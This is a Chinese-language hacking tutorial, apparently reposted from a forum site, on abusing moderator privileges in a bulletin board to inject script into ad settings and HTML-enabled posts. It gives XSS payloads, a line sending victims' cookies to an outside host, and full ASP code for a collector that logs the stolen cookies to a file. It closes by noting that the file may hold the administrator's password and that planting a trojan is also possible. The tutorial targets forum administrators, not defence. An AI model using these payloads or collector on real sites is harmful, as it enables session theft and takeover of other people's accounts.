此方法用于得到了一定的权限而进不了后台的办法
当然这个办法也可以获取其他管理员的cookie,万一他能进后台呢?
首先我们需要得到一个版主以上级别的号
例如:username:laoguier passWord:123456 level:版主
好的,我们先登陆论坛进入属于自己管理的版块
选择版面的管理进入分版广告设置
看到首页顶部广告了吧?默认的内容是
<a href=https://www.alipay.com/user/user_register.htm
target=_blank><img src="/UpLoadFiles/NewsPhoto/r_alipay.gif" border=0></a>
从这里完全可以看出支持Html
我们试着把里面的代码改为
<script>
window.location="http://www.google.com/"
</script>
我们提交修改
奇怪的事情终于发生了
window.location="http://www.google.com/"
这个代码是将页面转向为www.Google.com
但是不光是这里出错
大家回到首页刷新,你会发现论坛首页一片混乱,那是什么?
告诉你那是后台的配置信息。
相信大家到这里已经明白了版主对一个论坛的威胁性了吧?
注意还有在发帖的时候你是不是发现有的主题有颜色?红色、蓝色之类的
那代表主题内容已可以使用html代码
选择发表新帖。在输入主题的旁边选择HTMLZ支持
写入<script>alert(document.cookie)</script>发送后,点击你发的主题你看看会出现什么意外?
虽然我还没做深入的研究,不过这个已经能让管理员受的了
插入获取COOKIES的代码
<script>document.location='http://www.hackbase.com/cookie.asp?msg='+.</script>
写个盗cookie.ASP的代码到自己的空间上
<%
cookiefile=Server.MapPath("cookie.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set cookiefile=fs.OpenTextfile(cookiefile,8,True,0)
cookiefile.Write(Request.QueryString&"<br>")
cookiefile.close
set fs = nothing
%>
获取到cookie后目录下会出现一个cookie.txt的文件里面也许就有管理员密码哦!想了想挂马也有可以的!
(出处:http://www.sheup.com)